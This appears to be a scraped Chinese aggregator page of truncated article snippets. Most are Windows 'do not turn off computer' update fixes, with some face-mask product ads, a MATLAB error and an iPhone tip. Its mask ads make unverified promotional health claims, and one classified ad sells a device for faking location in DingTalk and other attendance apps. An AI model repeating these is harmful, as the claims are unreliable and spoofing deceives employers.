原标题:「发现」铁皮石斛仙草之神奇功效用于医用面膜丽彦妆铁皮石斛医用面膜|石斛多糖无菌修护补水贴19大优势: 1、铁皮石斛:自唐宋以来,一直被列为皇室贡品,铁皮石斛生于海拔1600米的悬崖峭壁之上,繁殖力差,产量极低,所以古代仅供皇室、贵族享用 2、铁皮石斛自古民间…...
2024/5/4 23:55:16 - 丽彦妆\医用面膜\冷敷贴轻奢医学护肤引导者
原标题:丽彦妆\医用面膜\冷敷贴轻奢医学护肤引导者【公司简介】 广州华彬企业隶属香港华彬集团有限公司,专注美业21年,其旗下品牌: 「圣茵美」私密荷尔蒙抗衰,产后修复 「圣仪轩」私密荷尔蒙抗衰,产后修复 「花茵莳」私密荷尔蒙抗衰,产后修复 「丽彦妆」专注医学护…...
2024/5/4 23:54:58 - 广州械字号面膜生产厂家OEM/ODM4项须知!
原标题:广州械字号面膜生产厂家OEM/ODM4项须知!广州械字号面膜生产厂家OEM/ODM流程及注意事项解读: 械字号医用面膜,其实在我国并没有严格的定义,通常我们说的医美面膜指的应该是一种「医用敷料」,也就是说,医用面膜其实算作「医疗器械」的一种,又称「医用冷敷贴」。 …...
2024/5/6 21:42:42 - 械字号医用眼膜缓解用眼过度到底有无作用?
原标题:械字号医用眼膜缓解用眼过度到底有无作用?医用眼膜/械字号眼膜/医用冷敷眼贴 凝胶层为亲水高分子材料,含70%以上的水分。体表皮肤温度传导到本产品的凝胶层,热量被凝胶内水分子吸收,通过水分的蒸发带走大量的热量,可迅速地降低体表皮肤局部温度,减轻局部皮肤的灼…...
2024/5/4 23:54:56 - 配置失败还原请勿关闭计算机,电脑开机屏幕上面显示,配置失败还原更改 请勿关闭计算机 开不了机 这个问题怎么办...
解析如下:1、长按电脑电源键直至关机,然后再按一次电源健重启电脑,按F8健进入安全模式2、安全模式下进入Windows系统桌面后,按住“winR”打开运行窗口,输入“services.msc”打开服务设置3、在服务界面,选中…...
2022/11/19 21:17:18 - 错误使用 reshape要执行 RESHAPE,请勿更改元素数目。
%读入6幅图像(每一幅图像的大小是564*564) f1 imread(WashingtonDC_Band1_564.tif); subplot(3,2,1),imshow(f1); f2 imread(WashingtonDC_Band2_564.tif); subplot(3,2,2),imshow(f2); f3 imread(WashingtonDC_Band3_564.tif); subplot(3,2,3),imsho…...
2022/11/19 21:17:16 - 配置 已完成 请勿关闭计算机,win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机...
win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机”问题的解决方法在win7系统关机时如果有升级系统的或者其他需要会直接进入一个 等待界面,在等待界面中我们需要等待操作结束才能关机,虽然这比较麻烦,但是对系统进行配置和升级…...
2022/11/19 21:17:15 - 台式电脑显示配置100%请勿关闭计算机,“准备配置windows 请勿关闭计算机”的解决方法...
有不少用户在重装Win7系统或更新系统后会遇到“准备配置windows,请勿关闭计算机”的提示,要过很久才能进入系统,有的用户甚至几个小时也无法进入,下面就教大家这个问题的解决方法。第一种方法:我们首先在左下角的“开始…...
2022/11/19 21:17:14 - win7 正在配置 请勿关闭计算机,怎么办Win7开机显示正在配置Windows Update请勿关机...
置信有很多用户都跟小编一样遇到过这样的问题,电脑时发现开机屏幕显现“正在配置Windows Update,请勿关机”(如下图所示),而且还需求等大约5分钟才干进入系统。这是怎样回事呢?一切都是正常操作的,为什么开时机呈现“正…...
2022/11/19 21:17:13 - 准备配置windows 请勿关闭计算机 蓝屏,Win7开机总是出现提示“配置Windows请勿关机”...
Win7系统开机启动时总是出现“配置Windows请勿关机”的提示,没过几秒后电脑自动重启,每次开机都这样无法进入系统,此时碰到这种现象的用户就可以使用以下5种方法解决问题。方法一:开机按下F8,在出现的Windows高级启动选…...
2022/11/19 21:17:12 - 准备windows请勿关闭计算机要多久,windows10系统提示正在准备windows请勿关闭计算机怎么办...
有不少windows10系统用户反映说碰到这样一个情况,就是电脑提示正在准备windows请勿关闭计算机,碰到这样的问题该怎么解决呢,现在小编就给大家分享一下windows10系统提示正在准备windows请勿关闭计算机的具体第一种方法:1、2、依次…...
2022/11/19 21:17:11 - 配置 已完成 请勿关闭计算机,win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机”的解决方法...
今天和大家分享一下win7系统重装了Win7旗舰版系统后,每次关机的时候桌面上都会显示一个“配置Windows Update的界面,提示请勿关闭计算机”,每次停留好几分钟才能正常关机,导致什么情况引起的呢?出现配置Windows Update…...
2022/11/19 21:17:10 - 电脑桌面一直是清理请关闭计算机,windows7一直卡在清理 请勿关闭计算机-win7清理请勿关机,win7配置更新35%不动...
只能是等着,别无他法。说是卡着如果你看硬盘灯应该在读写。如果从 Win 10 无法正常回滚,只能是考虑备份数据后重装系统了。解决来方案一:管理员运行cmd:net stop WuAuServcd %windir%ren SoftwareDistribution SDoldnet start WuA…...
2022/11/19 21:17:09 - 计算机配置更新不起,电脑提示“配置Windows Update请勿关闭计算机”怎么办?
原标题:电脑提示“配置Windows Update请勿关闭计算机”怎么办?win7系统中在开机与关闭的时候总是显示“配置windows update请勿关闭计算机”相信有不少朋友都曾遇到过一次两次还能忍但经常遇到就叫人感到心烦了遇到这种问题怎么办呢?一般的方…...
2022/11/19 21:17:08 - 计算机正在配置无法关机,关机提示 windows7 正在配置windows 请勿关闭计算机 ,然后等了一晚上也没有关掉。现在电脑无法正常关机...
关机提示 windows7 正在配置windows 请勿关闭计算机 ,然后等了一晚上也没有关掉。现在电脑无法正常关机以下文字资料是由(历史新知网www.lishixinzhi.com)小编为大家搜集整理后发布的内容,让我们赶快一起来看一下吧!关机提示 windows7 正在配…...
2022/11/19 21:17:05 - 钉钉提示请勿通过开发者调试模式_钉钉请勿通过开发者调试模式是真的吗好不好用...
钉钉请勿通过开发者调试模式是真的吗好不好用 更新时间:2020-04-20 22:24:19 浏览次数:729次 区域: 南阳 > 卧龙 列举网提醒您:为保障您的权益,请不要提前支付任何费用! 虚拟位置外设器!!轨迹模拟&虚拟位置外设神器 专业用于:钉钉,外勤365,红圈通,企业微信和…...
2022/11/19 21:17:05 - 配置失败还原请勿关闭计算机怎么办,win7系统出现“配置windows update失败 还原更改 请勿关闭计算机”,长时间没反应,无法进入系统的解决方案...
前几天班里有位学生电脑(windows 7系统)出问题了,具体表现是开机时一直停留在“配置windows update失败 还原更改 请勿关闭计算机”这个界面,长时间没反应,无法进入系统。这个问题原来帮其他同学也解决过,网上搜了不少资料&#x…...
2022/11/19 21:17:04 - 一个电脑无法关闭计算机你应该怎么办,电脑显示“清理请勿关闭计算机”怎么办?...
本文为你提供了3个有效解决电脑显示“清理请勿关闭计算机”问题的方法,并在最后教给你1种保护系统安全的好方法,一起来看看!电脑出现“清理请勿关闭计算机”在Windows 7(SP1)和Windows Server 2008 R2 SP1中,添加了1个新功能在“磁…...
2022/11/19 21:17:03 - 请勿关闭计算机还原更改要多久,电脑显示:配置windows更新失败,正在还原更改,请勿关闭计算机怎么办...
许多用户在长期不使用电脑的时候,开启电脑发现电脑显示:配置windows更新失败,正在还原更改,请勿关闭计算机。。.这要怎么办呢?下面小编就带着大家一起看看吧!如果能够正常进入系统,建议您暂时移…...
2022/11/19 21:17:02 - 还原更改请勿关闭计算机 要多久,配置windows update失败 还原更改 请勿关闭计算机,电脑开机后一直显示以...
配置windows update失败 还原更改 请勿关闭计算机,电脑开机后一直显示以以下文字资料是由(历史新知网www.lishixinzhi.com)小编为大家搜集整理后发布的内容,让我们赶快一起来看一下吧!配置windows update失败 还原更改 请勿关闭计算机&#x…...
2022/11/19 21:17:01 - 电脑配置中请勿关闭计算机怎么办,准备配置windows请勿关闭计算机一直显示怎么办【图解】...
不知道大家有没有遇到过这样的一个问题,就是我们的win7系统在关机的时候,总是喜欢显示“准备配置windows,请勿关机”这样的一个页面,没有什么大碍,但是如果一直等着的话就要两个小时甚至更久都关不了机,非常…...
2022/11/19 21:17:00 - 正在准备配置请勿关闭计算机,正在准备配置windows请勿关闭计算机时间长了解决教程...
当电脑出现正在准备配置windows请勿关闭计算机时,一般是您正对windows进行升级,但是这个要是长时间没有反应,我们不能再傻等下去了。可能是电脑出了别的问题了,来看看教程的说法。正在准备配置windows请勿关闭计算机时间长了方法一…...
2022/11/19 21:16:59 - 配置失败还原请勿关闭计算机,配置Windows Update失败,还原更改请勿关闭计算机...
我们使用电脑的过程中有时会遇到这种情况,当我们打开电脑之后,发现一直停留在一个界面:“配置Windows Update失败,还原更改请勿关闭计算机”,等了许久还是无法进入系统。如果我们遇到此类问题应该如何解决呢࿰…...
2022/11/19 21:16:58 - 如何在iPhone上关闭“请勿打扰”
Apple’s “Do Not Disturb While Driving” is a potentially lifesaving iPhone feature, but it doesn’t always turn on automatically at the appropriate time. For example, you might be a passenger in a moving car, but your iPhone may think you’re the one dri…...
2022/11/19 21:16:57